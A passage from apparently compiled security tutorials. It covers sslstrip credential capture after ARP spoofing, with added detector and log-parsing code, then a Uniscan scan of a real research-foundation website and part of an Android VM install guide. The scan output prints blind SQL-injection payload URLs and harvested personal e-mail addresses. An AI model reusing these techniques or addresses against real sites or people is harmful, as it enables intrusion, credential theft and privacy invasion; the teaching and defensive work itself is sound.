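The forged replies in Figure 7 are also exactly what a defender can watch for. As an added example (my own code, not part of the article or of dsniff), here is a small ARP watcher in Python that takes "arp reply X is-at M" lines, in arpspoof's format above or in tcpdump's "ARP, Reply X is-at M" format, checks them against a baseline of known IP-to-MAC pairs, and raises an alert when an IP changes MAC or when one MAC answers for the gateway and another host at the same time. The baseline and sample lines are constructed from the addresses in this article; the tcpdump-style line is hypothetical.

```python
import re

# Matches arpspoof's own output ("... arp reply 192.168.237.2 is-at 0:c:29:fe:1e:c0")
# and tcpdump's ("ARP, Reply 192.168.237.2 is-at 00:0c:29:fe:1e:c0, length 28").
ARP_REPLY = re.compile(r"arp,?\s+reply\s+(\d+\.\d+\.\d+\.\d+)\s+is-at\s+([0-9a-f:]+)", re.I)


def norm_mac(mac):
    """Zero-pad and lower-case a MAC so 0:c:29:fe:1e:c0 == 00:0c:29:fe:1e:c0."""
    return ":".join(f"{int(octet, 16):02x}" for octet in mac.split(":"))


def parse_arp_replies(lines):
    """Yield (ip, mac) for every ARP reply found in the given text lines."""
    for line in lines:
        m = ARP_REPLY.search(line)
        if m:
            yield m.group(1), norm_mac(m.group(2))


class ArpWatch:
    """Track who claims which IP and flag the two signatures of arpspoof -r."""

    def __init__(self, gateway_ip, baseline):
        self.gateway_ip = gateway_ip
        self.baseline = {ip: norm_mac(mac) for ip, mac in baseline.items()}
        self.claims = {}          # ip -> set of MACs seen claiming it
        self.alerts = []

    def observe(self, ip, mac):
        self.claims.setdefault(ip, set()).add(mac)
        expected = self.baseline.get(ip)
        if expected and mac != expected:
            self._alert(f"{ip} claimed by {mac}, baseline says {expected}"
                        + (" [GATEWAY]" if ip == self.gateway_ip else ""))
        # One MAC answering for the gateway *and* for another host is the
        # bidirectional poisoning the article demonstrates.
        ips = {i for i, macs in self.claims.items() if mac in macs}
        if self.gateway_ip in ips and len(ips) > 1:
            others = sorted(ips - {self.gateway_ip})
            self._alert(f"{mac} answers for gateway {self.gateway_ip} and for {others}")

    def _alert(self, msg):
        if msg not in self.alerts:          # report each condition once
            self.alerts.append(msg)

    def feed(self, lines):
        for ip, mac in parse_arp_replies(lines):
            self.observe(ip, mac)
        return self.alerts


# Constructed baseline (what the nmap -sP sweep reported before the attack)
# and sample lines in arpspoof's and tcpdump's formats; not a real capture.
BASELINE = {
    "192.168.237.2": "00:50:56:ED:D4:DE",     # gateway
    "192.168.237.129": "00:0C:29:B0:E3:F3",   # XP target
    "192.168.237.128": "00:0c:29:fe:1e:c0",   # Kali
}
SAMPLE_LINES = [
    "21:04:59.000001 ARP, Reply 192.168.237.1 is-at 00:50:56:c0:00:08, length 28",
    "0:c:29:fe:1e:c0 0:c:29:b0:e3:f3 0806 42: arp reply 192.168.237.2 is-at 0:c:29:fe:1e:c0",
    "0:c:29:fe:1e:c0 0:50:56:ed:d4:de 0806 42: arp reply 192.168.237.129 is-at 0:c:29:fe:1e:c0",
    "21:05:01.123456 ARP, Reply 192.168.237.2 is-at 00:0c:29:fe:1e:c0, length 28",
]


def example():
    """Feed the sample lines through the watcher; returns the alert list."""
    return ArpWatch("192.168.237.2", BASELINE).feed(SAMPLE_LINES)
```

On a real segment, pipe `tcpdump -l -n arp` into the watcher and seed the baseline from a known-clean arp -a; the first alert fires on the very first forged reply, well before any credential has been submitted.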



Step 7.

arpspoof keeps running in this terminal and must not be stopped yet, so open a second one for sslstrip: File → Open Tab (Shift+Ctrl+T) in the terminal window (Figure 8).

Figure 8. Opening new terminal

Step 8.

In the new terminal, start sslstrip listening on the port the iptables rule redirects to. -l tells it which port to listen on (Figure 9).

Syntax - sslstrip -l 8080

root@MrQuiety:~# sslstrip -l 8080

sslstrip 0.9 by Moxie Marlinspike running...

Figure 9. Listening on port 8080



Step 9.

Now go to the target OS, open www.gmail.com, enter a username and password and click Sign in, exactly as a user checking Gmail would (Figure 10). Look at the address bar on the target: the login page that should be served from https://accounts.google.com/ServiceLogin... arrives as http://accounts.google.com/ServiceLogin..., with no padlock. That is sslstrip at work.

Figure 10. Logging on Gmail at the target PC
Step 10.

After clicking Sign in on the target, go back to the attacker PC (Kali). sslstrip has relayed the form submission and logged it; press Ctrl+C to stop it when you are done. The captured data is written to a file named sslstrip.log in the current directory (Figures 11 and 12).

What the terminal itself shows is a Python traceback from Twisted, the framework sslstrip is built on:

root@MrQuiety:~# sslstrip -l 8080

sslstrip 0.9 by Moxie Marlinspike running...
Unhandled Error
Traceback (most recent call last):
  File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 84, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 69, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
    return func(*args,**kw)
--- <exception caught here> ---
  File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 586, in _doReadOrWrite
    why = selectable.doRead()
  File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 199, in doRead
    rval = self.protocol.dataReceived(data)

Figure 11. Data captured by SSLStrip (part 1)

    return self.rawDataReceived(data)
  File "/usr/lib/python2.7/dist-packages/twisted/web/http.py", line 503, in rawDataReceived
    self.handleResponseEnd()
  File "/usr/share/sslstrip/sslstrip/ServerConnection.py", line 117, in handleResponseEnd
    self.shutdown()
  File "/usr/share/sslstrip/sslstrip/ServerConnection.py", line 154, in shutdown
    self.client.finish()
  File "/usr/lib/python2.7/dist-packages/twisted/web/http.py", line 866, in finish
    "Request.finish called on a request after its connection was lost; "
exceptions.RuntimeError: Request.finish called on a request after its connection was lost; use Request.notifyFinish to keep track of this.

Figure 12. Data captured by SSLStrip (part 2)

This error is raised when the browser closed its side of a connection before sslstrip had finished writing the response back. It is noisy but harmless: the proxy keeps running, and the POST it already relayed is in the log regardless.

Step 11.

Use the ls command to confirm that sslstrip.log has been written to the current directory (Figure 13).

root@MrQuiety:~# ls
[... other files in the home directory ...]  sslstrip.log  [...]
root@MrQuiety:~#

Figure 13. ls command



Step 12.

Use cat to read sslstrip.log and look at the URL-encoded form body: the victim's e-mail address and password are the Email and Passwd fields (Figure 14). The entry is tagged SECURE POST because the form's original target was an https:// URL that sslstrip downgraded; the remaining fields (GALX, continue, bgresponse and the rest) are the login form's own hidden state, relayed untouched.

Syntax - cat sslstrip.log

root@MrQuiety:~# cat sslstrip.log
2013-12-02 21:21:49,625 SECURE POST Data (accounts.google.com):
GALX=...&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F&service=mail&rm=false&ltmpl=default&scc=1&_utf8=%E2%98%83&bgresponse=...&Email=mrquiety@gmail.com&Passwd=123456789@&signIn=Sign+in&rmShown=1
root@MrQuiety:~#

Figure 14. Victim e-mail and password captured
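Reading the log by eye works for one entry; on an engagement you want the entries parsed and the secrets kept out of the report. This added example (my own code, not sslstrip's) parses the POST entries in sslstrip.log, URL-decodes each form body, and returns which hosts received credentials and for which account, reporting only the length of the password. The sample log is constructed in the format of Figure 14 with placeholder values; the key lists used to recognise account and password fields are my own assumption.

```python
import re
from urllib.parse import parse_qs

# One entry = a header line followed by the raw form body on the next line(s).
HEADER = re.compile(
    r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2},\d+) (SECURE )?POST Data \(([^)]+)\):$")
USER_KEYS = ("email", "user", "username", "login", "uid")      # assumed field names
SECRET_KEYS = ("passwd", "password", "pass", "pwd")


def parse_sslstrip_log(text):
    """Return a list of {'time', 'host', 'secure', 'fields'} per logged POST."""
    entries, lines, i = [], text.splitlines(), 0
    while i < len(lines):
        m = HEADER.match(lines[i])
        i += 1
        if not m:
            continue
        body = []
        while i < len(lines) and lines[i].strip() and not HEADER.match(lines[i]):
            body.append(lines[i].strip())   # terminals wrap long bodies; re-join them
            i += 1
        fields = {k: v[0] for k, v in parse_qs("".join(body), keep_blank_values=True).items()}
        entries.append({"time": m.group(1), "host": m.group(3),
                        "secure": m.group(2) is not None, "fields": fields})
    return entries


def credentials(entries):
    """Pick out (host, account, password length) without copying the password."""
    found = []
    for e in entries:
        user = next((v for k, v in e["fields"].items() if k.lower() in USER_KEYS), None)
        secret = next((v for k, v in e["fields"].items() if k.lower() in SECRET_KEYS), None)
        if user is not None and secret is not None:
            found.append({"time": e["time"], "host": e["host"], "user": user,
                          "secret_len": len(secret), "downgraded": e["secure"]})
    return found


# Constructed sample in the format of Figure 14 (placeholder account, not real data).
SAMPLE_LOG = """\
2013-12-02 21:21:49,625 SECURE POST Data (accounts.google.com):
GALX=abc123&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F&service=mail&rm=false&ltmpl=default
&scc=1&_utf8=%E2%98%83&Email=victim%40example.com&Passwd=s3cret%21&signIn=Sign+in&rmShown=1

2013-12-02 21:23:10,004 POST Data (www.example.net):
q=hubbard+brook&submit=Search
"""


def example():
    """Parse the sample log and extract the credential summary."""
    return credentials(parse_sslstrip_log(SAMPLE_LOG))
```

The "downgraded" flag is the one worth reporting to the site owner: a SECURE POST entry proves the form was reachable over plain HTTP first, which is precisely what an HSTS header (and preloading) would have prevented.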
How to Use Uniscan-gui / Uniscan in Kali Linux

by Rrajesh Kumar 

Uniscan is a simple Remote File Include, Local File Include and Remote Command Execution vulnerability scanner. It crawls the target, checks for common directories and files, and then runs a set of dynamic and static test plugins against the URLs it collected. It is quick but noisy, and like any automated scanner its findings need manual confirmation; run it only against hosts you are authorised to test.

Step 1. How to open

A. GUI Method (Figure 1).

Applications → Kali Linux → Web Applications → Web Vulnerability Scanners → uniscan-gui

Figure 1. Opening Uniscan in the GUI

B. Open the terminal, type uniscan-gui and hit Enter (Figure 2). A small window appears with a URL field, check boxes for the same tests the command-line flags enable (directory, file and robots.txt checks, dynamic, static and stress tests, web and server fingerprint) and Start scan and Open log file buttons.

root@MrQuiety:~# uniscan-gui

Figure 2. Opening Uniscan-gui in the terminal
C. Open the terminal, type uniscan and hit Enter. Without arguments it prints its option list (Figure 3).

root@MrQuiety:~# uniscan
####################################
# Uniscan project                  #
# http://uniscan.sourceforge.net/  #
####################################
V. 6.2

OPTIONS:
    -h  help
    -u  <url> example: https://www.example.com/
    -f  <file> list of url's
    -b  Uniscan go to background
    -q  Enable Directory checks
    -w  Enable File checks
    -e  Enable robots.txt and sitemap.xml check
    -d  Enable Dynamic checks
    -s  Enable Static checks
    -r  Enable Stress checks
    -i  <dork> Bing search
    -o  <dork> Google search
    -g  Web fingerprint
    -j  Server fingerprint

Figure 3. Opening Uniscan in the terminal



Step 2.

Scan a target for vulnerabilities (Figure 4). The single-letter flags can be combined: -qweds enables the directory checks (-q), file checks (-w), the robots.txt and sitemap.xml check (-e), the dynamic tests (-d) and the static tests (-s).

Syntax - uniscan -u <target host/IP> -qweds
Example - uniscan -u www.hubbardbrook.org -qweds

root@MrQuiety:~# uniscan -u www.hubbardbrook.org -qweds
####################################
# Uniscan project                  #
# http://uniscan.sourceforge.net/  #
####################################
V. 6.2

Figure 4. Scanning vulnerabilities on target



Step 2A.

The first block of output shows the domain, server banner and IP of the target URL, followed by the directory check: every directory from uniscan's word list that answered 200 (Figure 5).

Domain: http://www.hubbardbrook.org/
Server: Apache/2.2.16 (Debian)
IP: 132.177.243.198

Directory check:
[+] CODE: 200 URL: http://www.hubbardbrook.org/eml/
[+] CODE: 200 URL: http://www.hubbardbrook.org/gis/
[+] CODE: 200 URL: http://www.hubbardbrook.org/icons/
[+] CODE: 200 URL: http://www.hubbardbrook.org/image_library/
[+] CODE: 200 URL: http://www.hubbardbrook.org/people/
[+] CODE: 200 URL: http://www.hubbardbrook.org/samples/

Figure 5. Domain, server, IP, and directory check result



Step 3.

Next come the file check, the robots.txt and sitemap.xml checks, and the crawler with the list of plugins it loads (Figure 6). The crawler found 1371 URLs, which the later tests work through. A reachable /server-status is worth noting on its own: that is Apache's mod_status page, which reveals current requests and client addresses to anyone who can fetch it.

File check:
[+] CODE: 200 URL: http://www.hubbardbrook.org/server-status
[+] CODE: 200 URL: http://www.hubbardbrook.org/favicon.ico
[+] CODE: 200 URL: http://www.hubbardbrook.org/index.shtml

Check robots.txt:

Check sitemap.xml:

Crawler Started:
Plugin name: FCKeditor upload test v.1 Loaded.
Plugin name: E-mail Detection v.1.1 Loaded.
Plugin name: Code Disclosure v.1.1 Loaded.
Plugin name: Upload Form Detect v.1.1 Loaded.
Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
Plugin name: External Host Detect v.1.2 Loaded.
Plugin name: phpinfo() Disclosure v.1 Loaded.
Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
Crawling finished, 1371 URL's found!

Figure 6. File check, check robots.txt, check sitemap.xml, and Crawler plugin

Step 4.

The FCKeditor file-upload check (empty here) and the e-mail addresses the crawler harvested from the pages (Figure 7). Harvested addresses are raw material for phishing, which is why an address collector is part of a web scan.

FCKeditor File Upload:

E-mails:
[+] E-mail Found: dross@uvm.edu
[+] E-mail Found: wjohnson@hbresearchfoundation.org
[+] E-mail Found: ctdrisco@syr.edu
[+] E-mail Found: tgs3@pantheon.yale.edu,ellen
[+] E-mail Found: p.harty@worldnet.att.net
[+] E-mail Found: pavel.com@gmail.com
[+] E-mail Found: ggontarz@hotmail.com
[+] E-mail Found: rperron@fs.fed.us
[+] E-mail Found: pschaberg@fs.fed.us
[+] E-mail Found: gwalsh@usgs.gov
[+] E-mail Found: dali.fu@dartmouth.edu
[+] E-mail Found: wim.clymans@geol.lu.se
[+] E-mail Found: jlcampbell@fs.fed.us
[+] E-mail Found: ameybailey@fs.fed.us
[+] E-mail Found: rdyanai@mailbox.syr.edu
[+] E-mail Found: .denny@aya.yale.edu
[+] E-mail Found: ellen.denny@aya.yale.edu
[+] E-mail Found: lovettg@caryinstitute.org

Figure 7. FCKeditor file upload and e-mails information

Step 5.

Source Code Disclosure (Figure 8). The plugin flags pages whose body looks like server-side code or a raw file rather than rendered HTML; a .dwt.asp template and a junkfiles.txt under people/images/ are the kind of hits worth opening by hand.

Source Code Disclosure:
[+] Source Code Found: http://www.hubbardbrook.org/mirrorlake_kids_tour/what_lives_in_mirror_lake.htm
[+] Source Code Found: http://www.hubbardbrook.org/mirrorlake_kids_tour/how_did_everything.htm
[+] Source Code Found: http://www.hubbardbrook.org/people/images/junkfiles.txt
[+] Source Code Found: http://www.hubbardbrook.org/mirrorlake_kids_tour/protista.htm
[+] Source Code Found: http://www.hubbardbrook.org/mirrorlake_kids_tour/anamalia.htm
[+] Source Code Found: http://www.hubbardbrook.org/mirrorlake_kids_tour/what_is_ecology.htm
[+] Source Code Found: http://www.hubbardbrook.org/mirrorlake_kids_tour/Templates/index3.dwt.asp
[+] Source Code Found: http://www.hubbardbrook.org/people/images/2009
[+] Source Code Found: http://www.hubbardbrook.org/mirrorlake_kids_tour/anamalia2.htm

Figure 8. Source Code Disclosure

Step 6.

Timthumb and external hosts (Figure 9). The Timthumb check looks for vulnerable copies of the TimThumb image-resizing script (a 2011 remote code execution bug, fixed in 1.33) and found nothing. The external-host list is every third-party domain the crawled pages link to; it is useful for scoping, because those hosts are not part of the target and must not be scanned.

Timthumb:

External hosts:
[+] External Host Found: http://www.fsl.orst.edu
[+] External Host Found: http://www.allaboutbirds.org
[+] External Host Found: http://hydro.vwrrc.vt.edu
[+] External Host Found: http://www.endnote.com
[+] External Host Found: http://www.dartmouth.edu
[+] External Host Found: http://www.geol.lu.se
[+] External Host Found: http://www.syr.edu
[+] External Host Found: http://www.campbellsci.com
[+] External Host Found: http://hubbardbrook.org
[+] External Host Found: http://www.hubbardbrookfoundation.org
[+] External Host Found: http://www.geology.neab.net
[+] External Host Found: http://lvis.gsfc.nasa.gov
[+] External Host Found: http://www.microscopy-uk.org.uk
[+] External Host Found: http://www.bio.umass.edu
[+] External Host Found: http://www.uvm.edu

Figure 9. Timthumb and external hosts

Step 7.

PHPinfo() disclosure and web backdoors, both empty here, followed by the files the crawler ignored because they are data rather than pages (Figure 10).

PHPinfo() Disclosure:

Web Backdoors:

Ignored Files:
http://www.hubbardbrook.org/gis/metadata/111_gis_peaks_eml.xml
http://www.hubbardbrook.org/gis/metadata/91_gis_contusgs_eml.xml
http://www.hubbardbrook.org/6-12_education/TeacherActivities/TeachHdout/H03.doc
http://www.hubbardbrook.org/eml/5_knb-lter-hbr.5.6.xml
http://www.hubbardbrook.org/eml/35_knb-lter-hbr.35.6.xml
http://www.hubbardbrook.org/gis/metadata/94_gis_wsheds_eml.xml
http://www.hubbardbrook.org/gis/metadata/114_gis_wmnf_eml.xml
http://www.hubbardbrook.org/gis/metadata/99_gis_hb30mdem_eml.xml
http://www.hubbardbrook.org/people/images/..
http://www.hubbardbrook.org/eml/81_animals_-_bird_abundance_data.xml
http://www.hubbardbrook.org/gis/metadata/98_gis_hb10mdem_eml.xml
http://www.hubbardbrook.org/eml/14_atmospheric_inputs_-_precipitation_by_watershed.xml

Figure 10. PHPinfo () Disclosure and Web Backdoors

Step 8.

The dynamic tests and the plugins they load, then the FCKeditor tests (Figure 11). Dynamic tests send crafted requests (injected parameter values, traversal paths, backup-file names) to the URLs and parameters the crawler collected, so this is the noisy part of the scan.

Dynamic tests:
Plugin name: Learning New Directories v.1.2 Loaded.
Plugin name: FCKedior tests v.1.1 Loaded.
Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
Plugin name: Find Backup Files v.1.2 Loaded.
Plugin name: Blind SQL-injection tests v.1.3 Loaded.
Plugin name: Local File Include tests v.1.1 Loaded.
Plugin name: PHP CGI Argument Injection v.1.1 Loaded.
Plugin name: Remote Command Execution tests v.1.1 Loaded.
Plugin name: Remote File Include tests v.1.2 Loaded.
Plugin name: SQL-injection tests v.1.2 Loaded.
Plugin name: Cross-Site Scripting tests v.1.2 Loaded.
Plugin name: Web Shell Finder v.1.3 Loaded.
[+] 0 New directories added

FCKeditor tests:
No result

Figure 11. Dynamic test plugin names and FCKeditor tests

Step 9. 

Timthumb < 1.33 vulnerability, Backup Files and Blind SQL Injection vulnerability information (Figure 12). 




Blind SQL Injection:
[+] Vul [Blind SQL-i]: http://www.hubbardbrook.org/image_library/view.php?id=6'+AND+'1'='1
[+] Keyword: Sensing
[+] Vul [Blind SQL-i]: http://www.hubbardbrook.org/image_library/view.php?id=1'+AND+'1'='1
[+] Keyword: Sensing
[+] Vul [Blind SQL-i]: http://www.hubbardbrook.org/image_library/view.php?id=4'+AND+'1'='1
[+] Keyword: Sensing



Figure 12. Timthumb < 1.33 vulnerability, Backup Files and Blind SQL Injection vulnerability information 
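The three Blind SQL-i hits in Figure 12 come from a boolean-based check: the scanner resends the id with a condition that is always true and one that is always false, then looks for a word (the reported Keyword, here Sensing) that survives the true case but disappears in the false case. The Python below is an added example written for this edit, not code from the article or from Uniscan: it simulates a view.php?id= handler two ways over a constructed in-memory SQLite table (the rows, the view_vulnerable/view_fixed names and the "No image found" text are assumptions), sends the payload shape shown in Figure 12 together with its false-branch twin, and applies that comparison to both handlers.

```python
"""Boolean-based blind SQL injection: the vulnerable pattern, the fix, and the
true/false comparison a scanner performs.

Added example, not code from the article or from Uniscan.  The handler is a
stand-in for view.php?id= over a constructed in-memory SQLite table; the
true-branch payload shape (6'+AND+'1'='1) is the one in the scan output, the
false branch (...'1'='2) is the standard complement.
"""
import sqlite3
from urllib.parse import unquote_plus

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE images (id INTEGER PRIMARY KEY, title TEXT)")
conn.executemany("INSERT INTO images VALUES (?, ?)", [      # constructed rows
    (1, "Remote Sensing of the forest canopy"),
    (4, "Remote Sensing: LiDAR flight lines"),
    (6, "Remote Sensing imagery, watershed 6"),
])
NOT_FOUND = "No image found"        # assumed text of the page's empty result


def view_vulnerable(id_param):
    """Splices the id into a quoted literal, like a view.php built with string concat."""
    sql = "SELECT title FROM images WHERE id='%s'" % id_param
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.OperationalError:
        return "Database error"     # an unbalanced quote surfaces like this
    return "\n".join(r[0] for r in rows) or NOT_FOUND


def view_fixed(id_param):
    """Same lookup with a bound parameter: the input can never change the query."""
    rows = conn.execute("SELECT title FROM images WHERE id=?", (id_param,)).fetchall()
    return "\n".join(r[0] for r in rows) or NOT_FOUND


def payloads(base_id):
    """True- and false-branch ids, URL-decoded the way the server sees them."""
    return (unquote_plus(base_id + "'+AND+'1'='1"),
            unquote_plus(base_id + "'+AND+'1'='2"))


def pick_keyword(fetch, base_id):
    """A word present in the normal page but absent from the false-branch page;
    this is the kind of marker the scan output reports as 'Keyword'."""
    _, false_id = payloads(base_id)
    diff = set(fetch(base_id).split()) - set(fetch(false_id).split())
    return max(sorted(diff), key=len) if diff else None


def blind_sqli_check(fetch, base_id, keyword):
    """True when the keyword is in the normal and true-branch responses but
    missing from the false-branch one: the injected condition is evaluated."""
    true_id, false_id = payloads(base_id)
    if keyword not in fetch(base_id):
        return False                # the marker has to come from the real page
    return keyword in fetch(true_id) and keyword not in fetch(false_id)


if __name__ == "__main__":
    for name, handler in (("vulnerable", view_vulnerable), ("fixed", view_fixed)):
        kw = pick_keyword(handler, "6")
        print(name, "keyword:", kw, "blind SQLi:", blind_sqli_check(handler, "6", kw))
```

Note that pick_keyword finds a candidate word for the fixed handler too, because any mangled id yields the empty page; what separates the two is the true branch, which only the vulnerable handler answers like the baseline. That is also why a single differing response is not proof: confirm a scanner hit by hand with both branches before reporting it.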



Step 10.

Local File Include, PHP CGI Argument Injection, Remote Command Execution, Remote File Include, SQL 
Injection (Figure 13). 
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Figure 13. Local File Include, PHP CGI Argument Injection, Remote Command Execution, Remote File 
Include, SQL Injection 

Step 11.

Web Shell Finder, Static test plugin names, Local file Include, Remote Command Execution (Figure 14). 



Web Shell Finder:
No result

Static tests:
Plugin name: Local File Include tests v.1.1 Loaded.
Plugin name: Remote Command Execution tests v.1.1 Loaded.
Plugin name: Remote File Include tests v.1.1 Loaded.




Figure 14. Web Shell Finder, Static test plugin names, Local file Include, Remote Command Execution 



Step 12.

Remote File Include (Figure 15). 



Remote File Include:
No result

Scan end date: 2-12-2013 6:51:45

HTML report saved in: report/www.hubbardbrook.org.html
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Figure 15. Remote File Include 



Step 13. 



Here we start Uniscan-gui. First, enter the target URL in the URL field. Then tick the boxes under Uniscan Options for the kinds of scan and the plugins you want to run. Click Start scan and wait for the scan to finish. When it completes, click Open log file to see the scan results (Figure 16).

[Screenshot: Uniscan-gui. URL: www.hubbardbrook.org. Uniscan Options: Check Directory, Check Files, Check robots.txt, Dynamic tests, Static tests, Stress tests, Web Fingerprint, Server Fingerprint. Buttons: Start scan, Open log file. Annotations: 1. enter the URL you want to scan; 2. tick the tests/plugins you want to run; 3. click Start scan; 4. Open log file shows all your scan results.]



Figure 16. Scanning options 



Step 14.



Open the log file to see the scan results (Figure 17).



####################################
#          Uniscan project         #
#  http://uniscan.sourceforge.net/ #
####################################
V. 6.2

Scan date: 1-12-2013 20:46:35

Domain: http://www.hubbardbrook.org/
Server: Apache/2.2.16 (Debian)
IP: 132.177.243.138

Directory check:
[+] CODE: 200 URL: http://www.hubbardbrook.org/eml/
[+] CODE: 200 URL: http://www.hubbardbrook.org/gis/
[+] CODE: 200 URL: http://www.hubbardbrook.org/icons/
[+] CODE: 200 URL: http://www.hubbardbrook.org/image_library/
[+] CODE: 200 URL: http://www.hubbardbrook.org/people/
[+] CODE: 200 URL: http://www.hubbardbrook.org/samples/

File check:
[+] CODE: 200 URL: http://www.hubbardbrook.org/server-status
[+] CODE: 200 URL: http://www.hubbardbrook.org/favicon.ico
[+] CODE: 200 URL: http://www.hubbardbrook.org/index.shtml



Figure 17. Log file - scan results 
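The log in Figure 17 is plain text in a fixed shape ([+] CODE: <status> URL: <url> under a section header, [+] Vul [<type>]: <url> followed by [+] Keyword: <word>), so it is easy to triage automatically. Note the 200 on /server-status: if that really is Apache's mod_status page it leaks active requests and client addresses, which is a finding in its own right, but a site that answers 200 for any path produces the same log line, so it has to be confirmed by hand. The Python below is an added example, not part of the article or of Uniscan: it parses a log constructed here in the format of Figures 12 and 17 (the example.org URLs, the severity rules and the sensitive-path table are assumptions) and ranks what it finds.

```python
"""Triage a Uniscan text log: parse the [+] lines and rank what they mean.

Added example, not part of the article or of Uniscan.  The log below is
constructed in the format of the article's Figures 12 and 17 (example.org is
a placeholder host); the severity rules and the sensitive-path table are this
example's own assumptions.
"""
import re
from collections import Counter

SAMPLE_LOG = """\
Domain: http://www.example.org/
Server: Apache/2.2.16 (Debian)
IP: 192.0.2.10

Directory check:
[+] CODE: 200 URL: http://www.example.org/eml/
[+] CODE: 200 URL: http://www.example.org/image_library/

File check:
[+] CODE: 200 URL: http://www.example.org/server-status
[+] CODE: 200 URL: http://www.example.org/favicon.ico
[+] CODE: 200 URL: http://www.example.org/index.shtml

Blind SQL Injection:
[+] Vul [Blind SQL-i]: http://www.example.org/image_library/view.php?id=6'+AND+'1'='1
[+] Keyword: Sensing

Remote File Include:
No result
"""

# Paths whose mere presence (HTTP 200) deserves a look
SENSITIVE_PATHS = {
    "/server-status": "Apache mod_status reachable: shows live requests and client IPs",
    "/server-info": "Apache mod_info reachable: shows the full server configuration",
    "/phpinfo.php": "phpinfo() reachable: shows paths, modules and environment",
    "/.git/": "version-control metadata reachable: source may be recoverable",
    "/.env": "environment file reachable: may hold credentials",
}
VERIFY = "confirm by hand; a catch-all page that answers 200 to any path looks the same"

SECTION_RE = re.compile(r"^([A-Za-z][^:]*):\s*$")          # e.g. "File check:"
CODE_RE = re.compile(r"^\[\+\] CODE: (\d{3}) URL: (\S+)$")
VUL_RE = re.compile(r"^\[\+\] Vul \[([^\]]+)\]: (\S+)$")
KEY_RE = re.compile(r"^\[\+\] Keyword: (\S+)$")


def url_path(url):
    """Path component of an absolute http(s) URL ("/" when there is none)."""
    parts = url.split("/", 3)
    return "/" + parts[3] if len(parts) == 4 else "/"


def triage(log_text):
    """Return findings sorted high > medium > info, each as a dict."""
    findings, section, last_vul = [], None, None
    for raw in log_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Server: "):
            findings.append({"severity": "info", "kind": "banner", "url": None,
                             "detail": "server version disclosed: " + line[8:]})
            continue
        m = SECTION_RE.match(line)
        if m:
            section = m.group(1)
            continue
        m = VUL_RE.match(line)
        if m:
            last_vul = {"severity": "high", "kind": m.group(1), "url": m.group(2),
                        "keyword": None, "detail": "scanner-reported; reproduce manually"}
            findings.append(last_vul)
            continue
        m = KEY_RE.match(line)
        if m and last_vul is not None:
            last_vul["keyword"] = m.group(1)      # the Keyword line follows its Vul line
            continue
        m = CODE_RE.match(line)
        if m and m.group(1) == "200":
            url = m.group(2)
            if section == "Directory check":
                findings.append({"severity": "info", "kind": "directory", "url": url,
                                 "detail": "directory answers 200; check for a listing"})
            elif url_path(url) in SENSITIVE_PATHS:
                findings.append({"severity": "medium", "kind": "exposed file", "url": url,
                                 "detail": SENSITIVE_PATHS[url_path(url)] + "; " + VERIFY})
    rank = {"high": 0, "medium": 1, "info": 2}
    return sorted(findings, key=lambda f: rank[f["severity"]])


def summary(findings):
    """Counts per severity, e.g. {'high': 1, 'medium': 1, 'info': 3}."""
    return dict(Counter(f["severity"] for f in findings))


if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    print(summary(found))
    for f in found:
        print(f["severity"].upper(), f["kind"], f["url"] or "", "-", f["detail"])
```

Ordinary 200s such as favicon.ico are dropped on purpose; the point of the pass is to pull the few lines that need a human (every Vul line, and a handful of well-known disclosure paths) out of the long directory and file lists.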
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How to Install Android 4.3 on VM 

by Rrajesh Kumar 

In my previous article I showed you how to install BackTrack 5 on a virtual machine. This time you will install Android 4.3. All you need is the Android-x86 4.3 ISO and virtual machine software.

Requirements 

• Android-x86-4.3.ISO 

• Any virtual machine software (VMware Player or VMware Workstation recommended)

Step 1.

Go to File and click on New Virtual Machine (Figure 1). 





[Screenshot: VMware Workstation 9 File menu: New Virtual Machine... (Ctrl+N), New Window, Open... (Ctrl+O), Close Tab (Ctrl+W), Connect to Server... (Ctrl+L), Virtualize a Physical Machine..., Export to OVF..., Map Virtual Disks..., Exit. New Virtual Machine... is highlighted.]
Figure 1. Creating a new virtual machine 



Step 2. 



Select Typical and click Next (Figure 2). 



[Screenshot: New Virtual Machine Wizard (VMware Workstation 9). Welcome to the New Virtual Machine Wizard. What type of configuration do you want? Typical (recommended): create a Workstation 9.0 virtual machine in a few easy steps. Custom (advanced): create a virtual machine with advanced options, such as a SCSI controller type, virtual disk type and compatibility with older VMware products. Buttons: Help, < Back, Next >, Cancel.]



Figure 2. Choosing the type of configuration 
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Step 3. 



Select the ISO file and click Next (Figure 3). The wizard may report that it cannot read the Android-x86 ISO and, as the later summary shows, it treats the guest as FreeBSD; that does not block the installation, so continue.

[Screenshot: New Virtual Machine Wizard, Guest Operating System Installation. A virtual machine is like a physical computer; it needs an operating system. How will you install the guest operating system? Install from: Installer disc (DVD RW Drive (G:)); Installer disc image file (iso): D:\Android-x86-4.3-20130725.iso, with the warning "Cannot read this file. Specify a different file or select a different option to continue."; I will install the operating system later (the virtual machine will be created with a blank hard disk). Annotation: click Browse and select the Android ISO. Buttons: Help, < Back, Next >, Cancel.]



Figure 3. Selecting the ISO file 

Step 4. 

You can rename the virtual machine and choose where it is stored (Figure 4).



[Screenshot: Name the Virtual Machine. What name would you like to use for this virtual machine? Virtual machine name: Android 4.3. Location: C:\Users\Musthiaib\Documents\Virtual Machines\Android 4.3 (the default location can be changed at Edit > Preferences). Annotations: rename it or leave the default; change the location to choose where the VM is saved. Buttons: < Back, Next >, Cancel.]



